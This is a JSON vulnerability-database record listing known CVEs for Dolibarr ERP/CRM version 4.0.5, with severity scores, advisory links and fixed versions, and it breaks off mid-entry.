{"url":"http://public2.vulnerablecode.io/api/packages/389105?format=json","purl":"pkg:composer/dolibarr/dolibarr@4.0.5","type":"composer","namespace":"dolibarr","name":"dolibarr","version":"4.0.5","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"16.0.5","latest_non_vulnerable_version":"18.0.2","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/292752?format=json","vulnerability_id":"VCID-1nww-vebc-rfe7","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18259","reference_id":"","reference_type":"","scores":[{"value":"0.00185","scoring_system":"epss","scoring_elements":"0.40099","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18259"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18259","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18259"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-008","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-008"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/386571?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2017-18259","GHSA-4323-cfj5-98mh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1nww-vebc-rfe7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/131826?format=json","vulnerability_id":"VCID-1qr4-xs72-e3a2","summary":"An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38886","reference_id":"","reference_type":"","scores":[{"value":"0.50447","scoring_system":"epss","scoring_elements":"0.97905","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38886"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38886","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38886"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf","reference_id":"AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-6773-rfjv-c54w","reference_id":"GHSA-6773-rfjv-c54w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6773-rfjv-c54w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379718?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38886","GHSA-6773-rfjv-c54w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1qr4-xs72-e3a2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/208666?format=json","vulnerability_id":"VCID-2fj8-fn7c-3ka1","summary":"Access Control vulnerability in Dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37517","reference_id":"","reference_type":"","scores":[{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.58309","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37517"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b57eb8284e830e30eefb26e3c5ede076ea24037c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b57eb8284e830e30eefb26e3c5ede076ea24037c"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/14.0.1","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/14.0.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37517","reference_id":"CVE-2021-37517","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37517"},{"reference_url":"https://github.com/advisories/GHSA-xw7v-qrhc-jjg2","reference_id":"GHSA-xw7v-qrhc-jjg2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xw7v-qrhc-jjg2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19978?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1"}],"aliases":["CVE-2021-37517","GHSA-xw7v-qrhc-jjg2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2fj8-fn7c-3ka1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/322509?format=json","vulnerability_id":"VCID-2fk1-fu91-kfh1","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14201","reference_id":"","reference_type":"","scores":[{"value":"0.00146","scoring_system":"epss","scoring_elements":"0.34779","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14201"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/e76641c491e4105e9cb1ded6149771c621d822b5/ChangeLog#L2933","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/e76641c491e4105e9cb1ded6149771c621d822b5/ChangeLog#L2933"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14201","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14201"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-011","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-011"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384545?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14201","GHSA-25h3-mw3p-w8r7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2fk1-fu91-kfh1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38949?format=json","vulnerability_id":"VCID-2p7p-cynw-77ej","summary":"Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters \n\nviewstatut in /dolibarr/commande/list.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5315","reference_id":"","reference_type":"","scores":[{"value":"0.5717","scoring_system":"epss","scoring_elements":"0.98186","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5315"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5315","reference_id":"CVE-2024-5315","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5315"},{"reference_url":"https://github.com/advisories/GHSA-q8x7-jc3h-p8xc","reference_id":"GHSA-q8x7-jc3h-p8xc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q8x7-jc3h-p8xc"},{"reference_url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms","reference_id":"multiple-vulnerabilities-dolibarrs-erp-cms","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-05-24T14:11:03Z/"}],"url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/455558?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"}],"aliases":["CVE-2024-5315","GHSA-q8x7-jc3h-p8xc"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2p7p-cynw-77ej"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/297451?format=json","vulnerability_id":"VCID-375c-7shu-37bu","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-9838","reference_id":"","reference_type":"","scores":[{"value":"0.00185","scoring_system":"epss","scoring_elements":"0.40099","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-9838"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-9838","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-9838"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-008","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-008"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384678?format=json","purl":"pkg:composer/dolibarr/dolibarr@5.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1nww-vebc-rfe7"},{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-53d8-7k7n-vud1"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-884a-z62x-dyhq"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jmau-m9qu-s3h6"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4"}],"aliases":["CVE-2017-9838","GHSA-726g-cgcq-4xw8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-375c-7shu-37bu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/208326?format=json","vulnerability_id":"VCID-3ny3-rj44-ffgf","summary":"Code injection in dolibarr/dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0819","reference_id":"","reference_type":"","scores":[{"value":"0.01735","scoring_system":"epss","scoring_elements":"0.82879","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0819"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075"},{"reference_url":"https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0819","reference_id":"CVE-2022-0819","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0819"},{"reference_url":"https://github.com/advisories/GHSA-42qm-c3cf-9wv2","reference_id":"GHSA-42qm-c3cf-9wv2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-42qm-c3cf-9wv2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19557?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"V